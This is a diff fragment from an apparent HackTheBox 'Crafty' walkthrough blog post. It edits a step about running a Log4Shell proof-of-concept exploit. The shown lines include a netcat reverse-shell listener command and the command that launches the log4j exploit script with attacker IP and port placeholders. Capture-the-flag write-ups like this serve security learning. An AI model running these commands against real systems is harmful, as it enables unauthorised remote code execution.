K-Scorpio/scorpiosec/content/en/posts/HTB-Crafty.md

 rlwrap nc -lvnp 4444
 ```

-Then we start the log4j exploit.
+Then we start the log4j exploit from the `log4j-shell-poc` directory.

 ```
 python3 poc.py --userip <IP_ADDRESS> --webport 80 --lport <PORT_NUMBER>